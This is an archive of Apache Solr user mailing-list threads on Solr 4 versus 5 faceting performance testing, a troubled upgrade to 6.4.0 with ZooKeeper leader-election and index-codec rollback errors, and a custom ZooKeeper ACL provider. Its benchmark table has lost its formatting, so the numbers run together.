I am pleased to report that we are in Production on Solr 5.5.3 with comparable performance to Solr 4.8.1 through leveraging facet.method=uif as well as https://issues.apache.org/jira/browse/SOLR-9176. Thanks to everyone who worked on these! On Mon, Oct 3, 2016 at 3:55 PM, Solr User <solr...@gmail.com> wrote: > Below is some further testing. This was done in an environment that had > no other queries or updates during testing. We ran through several > scenarios so I pasted this with HTML formatting below so you may view this > as a table. Sorry if you have to pull this out into a different file for > viewing, but I did not want the formatting to be messed up. The times are > average times in milliseconds. Same test methodology as above except there > was a 5 minute warmup and a 15 minute test. > > Note that both the segment and deletions were recorded from only 1 out of > 2 of the shards so we cannot try to extrapolate a function between them and > the outcome. In other words, just view them as "non-optimized" versus > "optimized" and "has deletions" versus "no deletions". The only exceptions > are the 0 deletes were true for both shards and the 1 segment and 8 segment > cases were true for both shards. A few of the tests were repeated as well. > > The only conclusion that I could draw is that the number of segments and > the number of deletes appear to greatly influence the response times, at > least more than any difference in Solr version. There also appears to be > some external contributor to variancemaybe network, etc. > > Thoughts? > > > Date9/29/20169/29/ > 20169/29/20169/30/20169/30/ > 20169/30/20169/30/20169/30/ > 20169/30/20169/30/20169/30/ > 20169/30/20169/30/201610/3/ > 201610/3/201610/3/201610/3/2016Solr > Version5.5.25.5.24.8.14. > 8.14.8.15.5.25.5.25.5.2< > /td>5.5.25.5.25.5.25.5.2 td>5.5.24.8.14.8.14.8.1 td>4.8.1Deleted Docs57873 > 57873176958593694593694 > 578735787357873578730< > /td>00< > /td>0Segment Count3434 td>1827273434< > td>34348811 td>8811 > facet.method=uifYESYESN/A< > td>N/AN/AYESYESNO td>NONOYESYESNO td>N/AN/AN/AN/AScenario > #1198210145186< > td>190208209210206 td>1091427370160 td>1098385Scenario > #29288596258 td>7270777468< > td>7363616654 > 5251 > > > > > On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote: > >> I plan to re-test this in a separate environment that I have more control >> over and will share the results when I can. >> >> On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote: >> >>> Certainly. And I would of course welcome anyone else to test this for >>> themselves especially with facet.method=uif to see if that has indeed >>> bridged the gap between Solr 4 and Solr 5. I would be very happy if my >>> testing is invalid due to variance, problem in process, etc. One thing I >>> was pondering is if I should force merge the index to a certain amount of >>> segments because indexing yields a random number of segments and >>> deletions. The only thing stopping me short of doing that were >>> observations of longer Solr 4 times even with more deletions and similar >>> number of segments. >>> >>> We use Soasta as our testing tool. Before testing, load is sent for >>> 10-15 minutes to make sure any Solr caches have stabilized. Then the test >>> is run for 30 minutes of steady volume with Scenario #1 tested at 15 >>> req/sec and Scenario #2 tested at 100 req/sec. Each request is different >>> with input being pulled from data files. The requests are repeatable test >>> to test. >>> >>> The numbers posted above are average response times as reported by >>> Soasta. However, respective time differences are supported by Splunk which >>> indexes the Solr logs and Dynatrace which is instrumented on one of the >>> JVM's. >>> >>> The versions are deployed to the same machines thereby overlaying the >>> previous installation. Going Solr 4 to Solr 5, full indexing is run with >>> the same input data. Being in SolrCloud mode, the full indexing comprises >>> of indexing all documents and then deleting any that were not touched. >>> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not >>> load with a Solr 5 index. Testing Solr 4 after reverting yields the same >>> results as the previous Solr 4 test. >>> >>> >>> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> >>>
Re: 6.4.0 collection leader election and recovery issues
Thanks Shawn. Yes I did index some docs after moving to 6.4.0. The release notes did not mention anything about format being changed so I thought it would be backward compatible. Yeah my only recourse is to re-index data. Apart from that it was weird problems overall with 6.4.0. I was excited about using the unified highlighter but the zookeeper flakiness and constant disconnections of solr and sometimes not electing a leader for some collections made me rollback. Anyway thanks for promptly responding, will be more careful form next time. Thanks Ravi Kiran Bhaskar On Thu, Feb 2, 2017 at 9:41 AM, Shawn Heisey <apa...@elyograg.org> wrote: > On 2/2/2017 7:23 AM, Ravi Solr wrote: > > When i try to rollback from 6.4.0 to my original version of 6.0.1 it now > > throws another issue. Now I cant go to 6.4.0 nor can I roll back to 6.0.1 > > > > Could not load codec 'Lucene62'. Did you forget to add > > lucene-backward-codecs.jar? > > at org.apache.lucene.index.SegmentInfos.readCodec( > SegmentInfos.java:429) > > at > > org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349) > > at > > org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284) > > > > Hope this doesnt cost me dearly. Any ideas at least on how to rollback > > safely. > > This sounds like you did some indexing after the upgrade, or possibly > some index optimizing, so the parts of the index that were written (or > merged) by the newer version are now in a format that the older version > cannot use. Perhaps the merge policy was changed, causing Solr to do > some automatic merges once it started up. I am not aware of anything in > Solr that would write new segments without indexing input or a merge > policy change. > > As far as I know, there is no straightforward way to go backwards with > the index format. If you want to downgrade and don't have a backup of > your indexes from before the upgrade, you'll probably need to wipe the > index directory and completely reindex. > > Solr will always use the newest default index format for new segments > when you upgrade. Contrary to many user expectations, setting > luceneMatchVersion will *NOT* affect the index format, only the behavior > of components that do field analysis. > > Downgrading the index format would involve writing a custom Lucene > program that changes the active index format to the older version, then > runs a forceMerge on the index. It would be completely separate from > Solr, and definitely not straightforward. > > Thanks, > Shawn > >
Re: 6.4.0 collection leader election and recovery issues
Thanks Hendrik. Iam baffled as to why I did not hit this issue prior to moving to 6.4.0. On Thu, Feb 2, 2017 at 7:58 AM, Hendrik Haddorp <hendrik.hadd...@gmx.net> wrote: > Might be that your overseer queue overloaded. Similar to what is described > here: > https://support.lucidworks.com/hc/en-us/articles/203959903- > Bringing-up-downed-Solr-servers-that-don-t-want-to-come-up > > If the overseer queue gets too long you get hit by this: > https://github.com/Netflix/curator/wiki/Tech-Note-4 > > Try to request the overseer status > (/solr/admin/collections?action=OVERSEERSTATUS). > If that fails you likely hit that problem. If so you can also not use the > ZooKeeper command line client anymore. You can now restart all your ZK > nodes with an increases jute.maxbuffer value. Once ZK is restarted you can > use the ZK command line client with the same jute.maxbuffer value and check > how many entries /overseer/queue has in ZK. Normally there should be a few > entries but if you see thousands then you should delete them. I used a few > lines of Java code for that, again setting jute.maxbuffer to the same > value. Once cleaned up restart the Solr nodes one by one and keep an eye on > the overseer status. > > > On 02.02.2017 10:52, Ravi Solr wrote: > >> Following up on my previous email, the intermittent server unavailability >> seems to be linked to the interaction between Solr and Zookeeper. Can >> somebody help me understand what this error means and how to recover from >> it. >> >> 2017-02-02 09:44:24.648 ERROR >> (recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr >> x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3) >> [c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4] >> o.a.s.c.RecoveryStrategy Error while trying to recover. >> core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperE >> xception$SessionExpiredException: >> KeeperErrorCode = Session expired for /overseer/queue/qn- >> at org.apache.zookeeper.KeeperException.create(KeeperException. >> java:127) >> at org.apache.zookeeper.KeeperException.create(KeeperException. >> java:51) >> at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783) >> at >> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl >> ient.java:391) >> at >> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl >> ient.java:388) >> at >> org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(Zk >> CmdExecutor.java:60) >> at >> org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388) >> at >> org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244) >> at org.apache.solr.cloud.ZkController.publish(ZkController. >> java:1215) >> at org.apache.solr.cloud.ZkController.publish(ZkController. >> java:1128) >> at org.apache.solr.cloud.ZkController.publish(ZkController. >> java:1124) >> at >> org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoverySt >> rategy.java:334) >> at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy. >> java:222) >> at >> com.codahale.metrics.InstrumentedExecutorService$Instrumente >> dRunnable.run(InstrumentedExecutorService.java:176) >> at >> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511) >> at java.util.concurrent.FutureTask.run(FutureTask.java:266) >> at >> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolE >> xecutor.lambda$execute$0(ExecutorUtil.java:229) >> at >> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPool >> Executor.java:1142) >> at >> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoo >> lExecutor.java:617) >> at java.lang.Thread.run(Thread.java:745) >> >> Thanks >> >> Ravi Kiran Bhaskar >> >> On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote: >> >> Hello, >>> Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12 >>> hours of debugging spree!! Can somebody kindly help me out of this >>> misery. >>> >>> I have a set has 8 single shard collections with 3 replicas. As soon as I >>> updated the configs and started the servers one of my collection got >>> stuck >>> with no leader. I have restarted solr to no avail, I also tried to force >>> a >>> leader via collections API that dint work either. I also see that, from >>> time to time multiple solr nodes go down all at the sam
Re: 6.4.0 collection leader election and recovery issues
When i try to rollback from 6.4.0 to my original version of 6.0.1 it now throws another issue. Now I cant go to 6.4.0 nor can I roll back to 6.0.1 Could not load codec 'Lucene62'. Did you forget to add lucene-backward-codecs.jar? at org.apache.lucene.index.SegmentInfos.readCodec(SegmentInfos.java:429) at org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349) at org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284) Hope this doesnt cost me dearly. Any ideas at least on how to rollback safely. Thanks Ravi Kiran Bhaskar On Thu, Feb 2, 2017 at 4:52 AM, Ravi Solr <ravis...@gmail.com> wrote: > Following up on my previous email, the intermittent server unavailability > seems to be linked to the interaction between Solr and Zookeeper. Can > somebody help me understand what this error means and how to recover from > it. > > 2017-02-02 09:44:24.648 ERROR (recoveryExecutor-3-thread-16- > processing-n:xx.xxx.xxx.xxx:1234_solr x:clicktrack_shard1_replica4 > s:shard1 c:clicktrack r:core_node3) [c:clicktrack s:shard1 r:core_node3 > x:clicktrack_shard1_replica4] o.a.s.c.RecoveryStrategy Error while trying > to recover. core=clicktrack_shard1_replica4:org.apache.zookeeper. > KeeperException$SessionExpiredException: KeeperErrorCode = Session > expired for /overseer/queue/qn- > at org.apache.zookeeper.KeeperException.create( > KeeperException.java:127) > at org.apache.zookeeper.KeeperException.create( > KeeperException.java:51) > at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783) > at org.apache.solr.common.cloud.SolrZkClient$9.execute( > SolrZkClient.java:391) > at org.apache.solr.common.cloud.SolrZkClient$9.execute( > SolrZkClient.java:388) > at org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation( > ZkCmdExecutor.java:60) > at org.apache.solr.common.cloud.SolrZkClient.create( > SolrZkClient.java:388) > at org.apache.solr.cloud.DistributedQueue.offer( > DistributedQueue.java:244) > at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215) > at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128) > at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124) > at org.apache.solr.cloud.RecoveryStrategy.doRecovery( > RecoveryStrategy.java:334) > at org.apache.solr.cloud.RecoveryStrategy.run( > RecoveryStrategy.java:222) > at com.codahale.metrics.InstrumentedExecutorService$ > InstrumentedRunnable.run(InstrumentedExecutorService.java:176) > at java.util.concurrent.Executors$RunnableAdapter. > call(Executors.java:511) > at java.util.concurrent.FutureTask.run(FutureTask.java:266) > at org.apache.solr.common.util.ExecutorUtil$ > MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229) > at java.util.concurrent.ThreadPoolExecutor.runWorker( > ThreadPoolExecutor.java:1142) > at java.util.concurrent.ThreadPoolExecutor$Worker.run( > ThreadPoolExecutor.java:617) > at java.lang.Thread.run(Thread.java:745) > > Thanks > > Ravi Kiran Bhaskar > > On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote: > >> Hello, >> Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12 >> hours of debugging spree!! Can somebody kindly help me out of this misery. >> >> I have a set has 8 single shard collections with 3 replicas. As soon as I >> updated the configs and started the servers one of my collection got stuck >> with no leader. I have restarted solr to no avail, I also tried to force a >> leader via collections API that dint work either. I also see that, from >> time to time multiple solr nodes go down all at the same time, only a >> restart resolves the issue. >> >> The error snippets are shown below >> >> 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n: >> 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1 >> c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1 >> x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying >> to recover. >> core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: >> No registered leader was found after waiting for 4000ms , collection: >> clicktrack slice: shard1 >> >> solr.log.9:2017-02-02 01:43:41.336 INFO (zkCallback-4-thread-29-proces >> sing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster >> state change: [WatchedEvent state:SyncConnected type:NodeDataChanged >> path:/collections/clicktrack/state.json] for collection [clicktrack] has >> occurred - updating... (live nodes size: [1]) >> solr.log.9:2017-02-02 01:43:42.224 INFO (zkCallback-4-thread-29-proces &
Re: 6.4.0 collection leader election and recovery issues
Following up on my previous email, the intermittent server unavailability seems to be linked to the interaction between Solr and Zookeeper. Can somebody help me understand what this error means and how to recover from it. 2017-02-02 09:44:24.648 ERROR (recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3) [c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4] o.a.s.c.RecoveryStrategy Error while trying to recover. core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperException$SessionExpiredException: KeeperErrorCode = Session expired for /overseer/queue/qn- at org.apache.zookeeper.KeeperException.create(KeeperException.java:127) at org.apache.zookeeper.KeeperException.create(KeeperException.java:51) at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783) at org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:391) at org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:388) at org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(ZkCmdExecutor.java:60) at org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388) at org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244) at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215) at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128) at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124) at org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoveryStrategy.java:334) at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy.java:222) at com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:176) at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511) at java.util.concurrent.FutureTask.run(FutureTask.java:266) at org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at java.lang.Thread.run(Thread.java:745) Thanks Ravi Kiran Bhaskar On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote: > Hello, > Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12 > hours of debugging spree!! Can somebody kindly help me out of this misery. > > I have a set has 8 single shard collections with 3 replicas. As soon as I > updated the configs and started the servers one of my collection got stuck > with no leader. I have restarted solr to no avail, I also tried to force a > leader via collections API that dint work either. I also see that, from > time to time multiple solr nodes go down all at the same time, only a > restart resolves the issue. > > The error snippets are shown below > > 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n: > 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1 > c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1 > x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying > to recover. > core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: > No registered leader was found after waiting for 4000ms , collection: > clicktrack slice: shard1 > > solr.log.9:2017-02-02 01:43:41.336 INFO (zkCallback-4-thread-29- > processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A > cluster state change: [WatchedEvent state:SyncConnected > type:NodeDataChanged path:/collections/clicktrack/state.json] for > collection [clicktrack] has occurred - updating... (live nodes size: [1]) > solr.log.9:2017-02-02 01:43:42.224 INFO (zkCallback-4-thread-29- > processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A > cluster state change: [WatchedEvent state:SyncConnected > type:NodeDataChanged path:/collections/clicktrack/state.json] for > collection [clicktrack] has occurred - updating... (live nodes size: [1]) > solr.log.9:2017-02-02 01:43:43.767 INFO (zkCallback-4-thread-23- > processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A > cluster state change: [WatchedEvent state:SyncConnected > type:NodeDataChanged path:/collections/clicktrack/state.json] for > collection [clicktrack] has occurred - updating... (live nodes size: [1]) > > > Suspecting the worst I backed up the index and renamed the collection's > data folder and restarted the servers, this time the collection got a > proper leader. So is my index really corrupted ? Solr UI showed live nodes > just like the logs but without any leader. Even with the leader issue > somewhat alleviated after renaming the data folder and letting silr create > a ne
6.4.0 collection leader election and recovery issues
Hello, Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12 hours of debugging spree!! Can somebody kindly help me out of this misery. I have a set has 8 single shard collections with 3 replicas. As soon as I updated the configs and started the servers one of my collection got stuck with no leader. I have restarted solr to no avail, I also tried to force a leader via collections API that dint work either. I also see that, from time to time multiple solr nodes go down all at the same time, only a restart resolves the issue. The error snippets are shown below 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n:10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1 c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1 x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying to recover. core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: No registered leader was found after waiting for 4000ms , collection: clicktrack slice: shard1 solr.log.9:2017-02-02 01:43:41.336 INFO (zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent state:SyncConnected type:NodeDataChanged path:/collections/clicktrack/state.json] for collection [clicktrack] has occurred - updating... (live nodes size: [1]) solr.log.9:2017-02-02 01:43:42.224 INFO (zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent state:SyncConnected type:NodeDataChanged path:/collections/clicktrack/state.json] for collection [clicktrack] has occurred - updating... (live nodes size: [1]) solr.log.9:2017-02-02 01:43:43.767 INFO (zkCallback-4-thread-23-processing-n:10.128.159.245:9001_solr) [ ] o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent state:SyncConnected type:NodeDataChanged path:/collections/clicktrack/state.json] for collection [clicktrack] has occurred - updating... (live nodes size: [1]) Suspecting the worst I backed up the index and renamed the collection's data folder and restarted the servers, this time the collection got a proper leader. So is my index really corrupted ? Solr UI showed live nodes just like the logs but without any leader. Even with the leader issue somewhat alleviated after renaming the data folder and letting silr create a new data folder my servers did go down a couple of times. I am not all that well versed with zookeeper...any trick to make zookeeper pick a leader and be happy ? Did anybody have solr/zookeeper issues with 6.4.0 ? Thanks Ravi Kiran Bhaskar
Re: ClassNotFoundException with Custom ZkACLProvider
For those interested, I ended up bundling the customized ACL provider with the solr.war. I could not stomach looking at the stack trace in the logs. On Mon, Nov 7, 2016 at 4:47 PM, Solr User <solr...@gmail.com> wrote: > This is mostly just an FYI regarding future work on issues like SOLR-8792. > > I wanted admin update but world read on ZK since I do not have anything > sensitive from a read perspective in the Solr data and did not want to > force all SolrCloud clients to implement authentication just for read. So, > I extended DefaultZkACLProvider and implemented a replacement for > VMParamsAllAndReadonlyDigestZkACLProvider. > > My custom code is loaded from the sharedLib in solr.xml. However, there > is a temporary ZK lookup to read solr.xml (and chroot) which is obviously > done before loading sharedLib. Therefore, I am faced with a > ClassNotFoundException. This has no negative effect on the ACL > functionalityjust the annoying stack trace in the logs. I do not want > to package this custom code with the Solr code and do not want to package > this along with Solr dependencies in the Jetty lib/ext. > > So, I am planning to live with the stack trace and just wanted to share > this for any future work on the dynamic solr.xml and chroot lookups or in > case I am missing some work-around. > > Thanks! > >
ClassNotFoundException with Custom ZkACLProvider
This is mostly just an FYI regarding future work on issues like SOLR-8792. I wanted admin update but world read on ZK since I do not have anything sensitive from a read perspective in the Solr data and did not want to force all SolrCloud clients to implement authentication just for read. So, I extended DefaultZkACLProvider and implemented a replacement for VMParamsAllAndReadonlyDigestZkACLProvider. My custom code is loaded from the sharedLib in solr.xml. However, there is a temporary ZK lookup to read solr.xml (and chroot) which is obviously done before loading sharedLib. Therefore, I am faced with a ClassNotFoundException. This has no negative effect on the ACL functionalityjust the annoying stack trace in the logs. I do not want to package this custom code with the Solr code and do not want to package this along with Solr dependencies in the Jetty lib/ext. So, I am planning to live with the stack trace and just wanted to share this for any future work on the dynamic solr.xml and chroot lookups or in case I am missing some work-around. Thanks!
Re: Faceting and Grouping Performance Degradation in Solr 5
Below is some further testing. This was done in an environment that had no other queries or updates during testing. We ran through several scenarios so I pasted this with HTML formatting below so you may view this as a table. Sorry if you have to pull this out into a different file for viewing, but I did not want the formatting to be messed up. The times are average times in milliseconds. Same test methodology as above except there was a 5 minute warmup and a 15 minute test. Note that both the segment and deletions were recorded from only 1 out of 2 of the shards so we cannot try to extrapolate a function between them and the outcome. In other words, just view them as "non-optimized" versus "optimized" and "has deletions" versus "no deletions". The only exceptions are the 0 deletes were true for both shards and the 1 segment and 8 segment cases were true for both shards. A few of the tests were repeated as well. The only conclusion that I could draw is that the number of segments and the number of deletes appear to greatly influence the response times, at least more than any difference in Solr version. There also appears to be some external contributor to variancemaybe network, etc. Thoughts? Date9/29/20169/29/20169/29/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/201610/3/201610/3/201610/3/201610/3/2016Solr Version5.5.25.5.24.8.14.8.14.8.15.5.25.5.25.5.25.5.25.5.25.5.25.5.25.5.24.8.14.8.14.8.14.8.1Deleted Docs578735787317695859369459369457873578735787357873Segment Count34341827273434343488118811facet.method=uifYESYESN/AN/AN/AYESYESNONONOYESYESNON/AN/AN/AN/AScenario #119821014518619020820921020610914273701601098385Scenario #29288596258727077746873636166545251 On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote: > I plan to re-test this in a separate environment that I have more control > over and will share the results when I can. > > On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote: > >> Certainly. And I would of course welcome anyone else to test this for >> themselves especially with facet.method=uif to see if that has indeed >> bridged the gap between Solr 4 and Solr 5. I would be very happy if my >> testing is invalid due to variance, problem in process, etc. One thing I >> was pondering is if I should force merge the index to a certain amount of >> segments because indexing yields a random number of segments and >> deletions. The only thing stopping me short of doing that were >> observations of longer Solr 4 times even with more deletions and similar >> number of segments. >> >> We use Soasta as our testing tool. Before testing, load is sent for >> 10-15 minutes to make sure any Solr caches have stabilized. Then the test >> is run for 30 minutes of steady volume with Scenario #1 tested at 15 >> req/sec and Scenario #2 tested at 100 req/sec. Each request is different >> with input being pulled from data files. The requests are repeatable test >> to test. >> >> The numbers posted above are average response times as reported by >> Soasta. However, respective time differences are supported by Splunk which >> indexes the Solr logs and Dynatrace which is instrumented on one of the >> JVM's. >> >> The versions are deployed to the same machines thereby overlaying the >> previous installation. Going Solr 4 to Solr 5, full indexing is run with >> the same input data. Being in SolrCloud mode, the full indexing comprises >> of indexing all documents and then deleting any that were not touched. >> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not >> load with a Solr 5 index. Testing Solr 4 after reverting yields the same >> results as the previous Solr 4 test. >> >> >> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> >> wrote: >> >>> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote: >>> > Further testing indicates that any performance difference is not due >>> > to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing >>> > deletes. >>> >>> Sanity check: Could you describe how you test? >>> >>> * How many queries do you issue for each test? >>> * Are each query a new one or do you re-use the same query? >>> * Do you discard the first X calls? >>> * Are the numbers averages, medians or something third? >>> * What do you do about disk cache? >>> * Are both Solr's on the same machine? >>> * Do they use the same index? >>> * Do you alternate between testing 4.8.1 and 5.5.2 first? >>> >>> - Toke Eskildsen, State and University Library, Denmark >>> >> >> >
Re: Faceting and Grouping Performance Degradation in Solr 5
I plan to re-test this in a separate environment that I have more control over and will share the results when I can. On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote: > Certainly. And I would of course welcome anyone else to test this for > themselves especially with facet.method=uif to see if that has indeed > bridged the gap between Solr 4 and Solr 5. I would be very happy if my > testing is invalid due to variance, problem in process, etc. One thing I > was pondering is if I should force merge the index to a certain amount of > segments because indexing yields a random number of segments and > deletions. The only thing stopping me short of doing that were > observations of longer Solr 4 times even with more deletions and similar > number of segments. > > We use Soasta as our testing tool. Before testing, load is sent for 10-15 > minutes to make sure any Solr caches have stabilized. Then the test is run > for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and > Scenario #2 tested at 100 req/sec. Each request is different with input > being pulled from data files. The requests are repeatable test to test. > > The numbers posted above are average response times as reported by > Soasta. However, respective time differences are supported by Splunk which > indexes the Solr logs and Dynatrace which is instrumented on one of the > JVM's. > > The versions are deployed to the same machines thereby overlaying the > previous installation. Going Solr 4 to Solr 5, full indexing is run with > the same input data. Being in SolrCloud mode, the full indexing comprises > of indexing all documents and then deleting any that were not touched. > Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not > load with a Solr 5 index. Testing Solr 4 after reverting yields the same > results as the previous Solr 4 test. > > > On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> > wrote: > >> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote: >> > Further testing indicates that any performance difference is not due >> > to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing >> > deletes. >> >> Sanity check: Could you describe how you test? >> >> * How many queries do you issue for each test? >> * Are each query a new one or do you re-use the same query? >> * Do you discard the first X calls? >> * Are the numbers averages, medians or something third? >> * What do you do about disk cache? >> * Are both Solr's on the same machine? >> * Do they use the same index? >> * Do you alternate between testing 4.8.1 and 5.5.2 first? >> >> - Toke Eskildsen, State and University Library, Denmark >> > >
Re: Faceting and Grouping Performance Degradation in Solr 5
Certainly. And I would of course welcome anyone else to test this for themselves especially with facet.method=uif to see if that has indeed bridged the gap between Solr 4 and Solr 5. I would be very happy if my testing is invalid due to variance, problem in process, etc. One thing I was pondering is if I should force merge the index to a certain amount of segments because indexing yields a random number of segments and deletions. The only thing stopping me short of doing that were observations of longer Solr 4 times even with more deletions and similar number of segments. We use Soasta as our testing tool. Before testing, load is sent for 10-15 minutes to make sure any Solr caches have stabilized. Then the test is run for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and Scenario #2 tested at 100 req/sec. Each request is different with input being pulled from data files. The requests are repeatable test to test. The numbers posted above are average response times as reported by Soasta. However, respective time differences are supported by Splunk which indexes the Solr logs and Dynatrace which is instrumented on one of the JVM's. The versions are deployed to the same machines thereby overlaying the previous installation. Going Solr 4 to Solr 5, full indexing is run with the same input data. Being in SolrCloud mode, the full indexing comprises of indexing all documents and then deleting any that were not touched. Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not load with a Solr 5 index. Testing Solr 4 after reverting yields the same results as the previous Solr 4 test. On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> wrote: > On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote: > > Further testing indicates that any performance difference is not due > > to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing > > deletes. > > Sanity check: Could you describe how you test? > > * How many queries do you issue for each test? > * Are each query a new one or do you re-use the same query? > * Do you discard the first X calls? > * Are the numbers averages, medians or something third? > * What do you do about disk cache? > * Are both Solr's on the same machine? > * Do they use the same index? > * Do you alternate between testing 4.8.1 and 5.5.2 first? > > - Toke Eskildsen, State and University Library, Denmark >
Re: Faceting and Grouping Performance Degradation in Solr 5
